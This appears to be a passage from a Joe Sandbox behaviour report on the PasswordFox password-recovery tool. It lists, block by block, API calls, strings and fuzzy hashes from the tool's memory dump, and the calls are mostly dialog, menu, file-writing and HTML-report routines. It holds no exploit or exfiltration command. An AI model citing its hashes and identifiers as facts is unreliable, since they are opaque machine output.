                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00405405
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                        • API String ID: 3166385802-4125592482
                                        • Opcode ID: e7925b7c639ce5ccb6452d2b9abfb092da25b9a53f1a0af1939cc833b4a1da7c
                                        • Instruction ID: e34ee92e24309c31d70f713afcde4bed0f03b1ba035f10be4a3659d8cbe9581e
                                        • Opcode Fuzzy Hash: e7925b7c639ce5ccb6452d2b9abfb092da25b9a53f1a0af1939cc833b4a1da7c
                                        • Instruction Fuzzy Hash: 51414F75240901BBC716DB14EC95AAB3366E784345B10843AEC06A72A1DEBEA9C2CF5C
                                        APIs
                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002), ref: 004041B6
                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 004041D4
                                        • wcslen.MSVCRT ref: 004041E1
                                        • wcscpy.MSVCRT ref: 004041F1
                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 004041FB
                                        • wcscpy.MSVCRT ref: 0040420B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2767993716-572158859
                                        • Opcode ID: 80139e6b532b94f01ce9ce1e1c92038c37d2584c8a9306761def94e999b5e351
                                        • Instruction ID: e1356e26e723054dae363e03e241d1f330764c7fffbd77785f60b69d870017c2
                                        • Opcode Fuzzy Hash: 80139e6b532b94f01ce9ce1e1c92038c37d2584c8a9306761def94e999b5e351
                                        • Instruction Fuzzy Hash: 2501F771600114FAD7146790ED4AE9F7A6CDB44795B20417AFA01B41D2DB395F40D6AC
                                        APIs
                                          • Part of subcall function 00404530: GetFileAttributesW.KERNELBASE(00000000,004034E5,00000000), ref: 00404534
                                        • wcscpy.MSVCRT ref: 00405D8A
                                        • wcscpy.MSVCRT ref: 00405D9A
                                        • GetPrivateProfileIntW.KERNEL32(0040FDA8,rtl,00000000,0040FB98), ref: 00405DAB
                                          • Part of subcall function 0040591A: GetPrivateProfileStringW.KERNEL32(0040FDA8,?,0040C3EC,0040FE30,?,0040FB98), ref: 00405936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                        • API String ID: 3176057301-2039793938
                                        • Opcode ID: c2e55dc3a3a1f1d25c9100fd84f627f34b5cdf161f278e115aa86b060eee7ff2
                                        • Instruction ID: 6ff666b2312f51737588b3cf453df67747fbdff2f9c4fbd940fa7efab882ce8e
                                        • Opcode Fuzzy Hash: c2e55dc3a3a1f1d25c9100fd84f627f34b5cdf161f278e115aa86b060eee7ff2
                                        • Instruction Fuzzy Hash: 1EF09622ED1221B6D6203731AC47F2B3524CF92B25F54823BB948766D3DA7C5E058ADD
                                        APIs
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406114
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406122
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406133
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 0040614A
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406153
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406359
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00406375
                                        • memcpy.MSVCRT(?,0040F098,00000014), ref: 0040639A
                                        • memcpy.MSVCRT(?,0040F084,00000014,?,0040F098,00000014), ref: 004063AE
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406431
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040643B
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00406473
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 00405430
                                          • Part of subcall function 004053F1: LoadStringW.USER32(00000000,00000006,?,?), ref: 004054C9
                                          • Part of subcall function 004053F1: memcpy.MSVCRT(00000000,00000002), ref: 00405509
                                          • Part of subcall function 004053F1: wcscpy.MSVCRT ref: 00405472
                                          • Part of subcall function 004053F1: wcslen.MSVCRT ref: 00405490
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 0040549E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                        • String ID: ($d
                                        • API String ID: 1140211610-1915259565
                                        • Opcode ID: cc611055cbc00d40441fd59cb1f3185aa6fff62fb04399cc1b0be723267b4483
                                        • Instruction ID: c149448ff439af1a23248ab9c20f5614ad1bca10517fdd128314e281d934c264
                                        • Opcode Fuzzy Hash: cc611055cbc00d40441fd59cb1f3185aa6fff62fb04399cc1b0be723267b4483
                                        • Instruction Fuzzy Hash: 2A515972601700AFD724DF2AC586A5AB7E4FF48314F10853EE55ADB3D1DB78E9408B48
                                        APIs
                                        • memset.MSVCRT ref: 00403923
                                        • memset.MSVCRT ref: 00403937
                                        • _mbscpy.MSVCRT(?), ref: 00403951
                                        • _mbscpy.MSVCRT(?,?), ref: 00403996
                                        • _mbscpy.MSVCRT(?,00001000,?,?), ref: 004039AA
                                        • _mbscpy.MSVCRT(?,?,?,00001000,?,?), ref: 004039BD
                                        • wcscpy.MSVCRT ref: 004039CC
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 004039F3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00403A09
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                        • String ID:
                                        • API String ID: 59245283-0
                                        • Opcode ID: d9ceb4d61dd339e9f3ccf083ac235a8309192dc98f2fac4bce5a5254fec8cc2d
                                        • Instruction ID: a36109ca0726fc38a0f1bfd74a5c08f45524f924bc412f38d8147f3413982100
                                        • Opcode Fuzzy Hash: d9ceb4d61dd339e9f3ccf083ac235a8309192dc98f2fac4bce5a5254fec8cc2d
                                        • Instruction Fuzzy Hash: 773153B280011DABDB20DB54CC81FEA77BCFB04358F0445AAB959E3181DB34AB448FA8
                                        APIs
                                        • memset.MSVCRT ref: 00403923
                                        • memset.MSVCRT ref: 00403937
                                        • _mbscpy.MSVCRT(?), ref: 00403951
                                        • _mbscpy.MSVCRT(?,?), ref: 00403996
                                        • _mbscpy.MSVCRT(?,00001000,?,?), ref: 004039AA
                                        • _mbscpy.MSVCRT(?,?,?,00001000,?,?), ref: 004039BD
                                        • wcscpy.MSVCRT ref: 004039CC
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 004039F3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00403A09
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                        • String ID:
                                        • API String ID: 59245283-0
                                        • Opcode ID: 7f4b22131dff1f3b90c5f8b9439278ad1a1ba1842d8059aec2b2cc0d3d17a81d
                                        • Instruction ID: 651ebfe4d8686ab00d6d8292f5afd2682983f6326ab148555fa5b6b6826b63c5
                                        • Opcode Fuzzy Hash: 7f4b22131dff1f3b90c5f8b9439278ad1a1ba1842d8059aec2b2cc0d3d17a81d
                                        • Instruction Fuzzy Hash: 2A3165B280011DABDB20DB54CC81FEA77BCFB04358F0445BAB959E3181DB34AB448FA8
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,0000000C,?,?,00000000,004072DA,?,?), ref: 0040AF1D
                                        • memcpy.MSVCRT(?,&amp;,0000000A,?,?,00000000,004072DA,?,?), ref: 0040AF49
                                        • memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,004072DA,?,?), ref: 0040AF63
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: 1b3d7cfcd1d93c2aacca216e0e1b7c9728f3e8663702d8ac47ded56eca963c46
                                        • Instruction ID: 416d8c46835b4c1c04a167e830ff4e0fd7d22b0ad497b06718149a879596d325
                                        • Opcode Fuzzy Hash: 1b3d7cfcd1d93c2aacca216e0e1b7c9728f3e8663702d8ac47ded56eca963c46
                                        • Instruction Fuzzy Hash: 0B0128C2E4836360D73021558C42F770214D763761FA50637FD8A352C5E2BE0E67419F
                                        APIs
                                        • memset.MSVCRT ref: 00404C43
                                        • _snwprintf.MSVCRT ref: 00404C71
                                        • wcslen.MSVCRT ref: 00404C7D
                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 00404C95
                                        • wcslen.MSVCRT ref: 00404CA3
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 00404CB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpywcslen$_snwprintfmemset
                                        • String ID: %s (%s)
                                        • API String ID: 3979103747-1363028141
                                        • Opcode ID: 5c101a1717d761a794b4a47935445535065bc458e323c29de6e27173c3d94f1c
                                        • Instruction ID: f86e3ccb55b9338e549465bc076e66811fed7a5bdf8c9a07788a6878919dd802
                                        • Opcode Fuzzy Hash: 5c101a1717d761a794b4a47935445535065bc458e323c29de6e27173c3d94f1c
                                        • Instruction Fuzzy Hash: 49112C72800209EBCF61DF95C845E8AB7B9FF44308F1184BAE944B7152EB74A7598BD8
                                        APIs
                                        • memset.MSVCRT ref: 00405B72
                                        • GetDlgCtrlID.USER32(?), ref: 00405B7D
                                        • GetWindowTextW.USER32(?,?,00001000), ref: 00405B94
                                        • memset.MSVCRT ref: 00405BBB
                                        • GetClassNameW.USER32(?,?,000000FF), ref: 00405BD2
                                        • _wcsicmp.MSVCRT ref: 00405BE4
                                          • Part of subcall function 00405A25: memset.MSVCRT ref: 00405A38
                                          • Part of subcall function 00405A25: _itow.MSVCRT ref: 00405A46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                        • String ID: sysdatetimepick32
                                        • API String ID: 1028950076-4169760276
                                        • Opcode ID: 538cbd483b61a964058767800756a2ba6769951f459bf2ef98068abb1200db1f
                                        • Instruction ID: 5de72342b8da513a90488bf833bb40f5844d3311299e0a82bf0f1c6b52723e7a
                                        • Opcode Fuzzy Hash: 538cbd483b61a964058767800756a2ba6769951f459bf2ef98068abb1200db1f
                                        • Instruction Fuzzy Hash: C7115432940119BADB14EB91DD8AEAB777DEF04750F0041B6F918F2192E7349A41CB99
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402EF9
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402F0C
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402F21
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402F39
                                        • EndDialog.USER32(?,00000002), ref: 00402F55
                                        • EndDialog.USER32(?,00000001), ref: 00402F6A
                                          • Part of subcall function 00402C12: GetDlgItem.USER32(?,000003E9), ref: 00402C1F
                                          • Part of subcall function 00402C12: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00402C34
                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00402F82
                                        • SetDlgItemInt.USER32(0000009B,000003ED,?,00000000), ref: 0040308E
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Item$Dialog$MessageSend
                                        • String ID:
                                        • API String ID: 3975816621-0
                                        • Opcode ID: 9a1194d8446d2ee8c2c2fe6142bd65d3812135b4d2a6d970a0f87a6f4731ce56
                                        • Instruction ID: ea103f826b137b8a60ac69dd4fbb170abf4acf366394c0b9c5b180a58cd06299
                                        • Opcode Fuzzy Hash: 9a1194d8446d2ee8c2c2fe6142bd65d3812135b4d2a6d970a0f87a6f4731ce56
                                        • Instruction Fuzzy Hash: 4661B530200606AFDB21AF25CE89A1AB3B5EF54354F00C13FF915A66E1D7B8A991DB49
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 004030AE
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004030CA
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 004030F0
                                        • memset.MSVCRT ref: 00403100
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 0040312F
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 0040317C
                                        • SetFocus.USER32(?,?,?,?), ref: 00403185
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403195
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: e8135483db3ba8e4ac7329a3faff6584c00822408e7d482bedcdc92fe8be434f
                                        • Instruction ID: f95a6003199faa47c3198fe3a90fdd0791e5989fa17c62b28b46d5f40ed3ca29
                                        • Opcode Fuzzy Hash: e8135483db3ba8e4ac7329a3faff6584c00822408e7d482bedcdc92fe8be434f
                                        • Instruction Fuzzy Hash: 6E31B3B1500605AFDB249F29C885D1AFBA8FF08318B14853FF519EB2D1DB78ED408B98
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0040825D
                                        • GetWindowRect.USER32(?,?), ref: 00408273
                                        • GetWindowRect.USER32(?,?), ref: 00408286
                                        • BeginDeferWindowPos.USER32(00000003), ref: 004082A3
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004082C0
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004082E0
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 00408307
                                        • EndDeferWindowPos.USER32(?), ref: 00408310
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClient
                                        • String ID:
                                        • API String ID: 2126104762-0
                                        • Opcode ID: c8802fdd1d6b54d7263be30d962e9b56158ce9678fc0b2fa05ca925f4f816db0
                                        • Instruction ID: 576c8ee5cd9fe0ad8acbf0a33c8371cf80dfc0d116c28f559261c9bb12ca8a9e
                                        • Opcode Fuzzy Hash: c8802fdd1d6b54d7263be30d962e9b56158ce9678fc0b2fa05ca925f4f816db0
                                        • Instruction Fuzzy Hash: 5521C572940209FFEB118FA8CE89FEEBBB9FB48300F104164EA55B6165C73169519F24
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402CF5
                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00402D0E
                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00402D1B
                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00402D27
                                        • memset.MSVCRT ref: 00402D8B
                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 00402DC0
                                        • SetFocus.USER32(?), ref: 00402E44
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: 53ac9e94c51787f32452e3a1c56351e6c6f078232db4eca64ed623f35229ca7d
                                        • Instruction ID: 052c0cda838f63c4f563090851bace12a4a9b305ff2841cbfeb83369681a13eb
                                        • Opcode Fuzzy Hash: 53ac9e94c51787f32452e3a1c56351e6c6f078232db4eca64ed623f35229ca7d
                                        • Instruction Fuzzy Hash: 0C413C71D40209AFDB209F95CC89DAFBBB9EF84704F00806AF914B62D1D7B59A81CF64
                                        APIs
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        • wcscat.MSVCRT ref: 00406FEB
                                        • _snwprintf.MSVCRT ref: 00407012
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite_snwprintfwcscatwcslen
                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 2451617256-4153097237
                                        • Opcode ID: c454589146015d334ffcbe0a59ab454432961cc649d79cde94252bf8e64ce21d
                                        • Instruction ID: 35be35a740fbf3f9af44323595bc580f42b00a08e837909b78072e179b2ac8d4
                                        • Opcode Fuzzy Hash: c454589146015d334ffcbe0a59ab454432961cc649d79cde94252bf8e64ce21d
                                        • Instruction Fuzzy Hash: 1F31BE31900209EFDF14AF54CC86AAE7BB5FF44320F1141AAF905BB1D2DB35AA51DB94
                                        APIs
                                        • LoadMenuW.USER32(?,?), ref: 00405C32
                                          • Part of subcall function 00405A5C: GetMenuItemCount.USER32(?), ref: 00405A72
                                          • Part of subcall function 00405A5C: memset.MSVCRT ref: 00405A91
                                          • Part of subcall function 00405A5C: GetMenuItemInfoW.USER32 ref: 00405ACD
                                          • Part of subcall function 00405A5C: wcschr.MSVCRT ref: 00405AE5
                                        • DestroyMenu.USER32(00000000), ref: 00405C50
                                        • CreateDialogParamW.USER32(?,?,00000000,00405C07,00000000), ref: 00405C9F
                                        • memset.MSVCRT ref: 00405CBB
                                        • GetWindowTextW.USER32(00000000,?,00001000), ref: 00405CD0
                                          • Part of subcall function 00405893: _snwprintf.MSVCRT ref: 004058B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmp
                                         • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
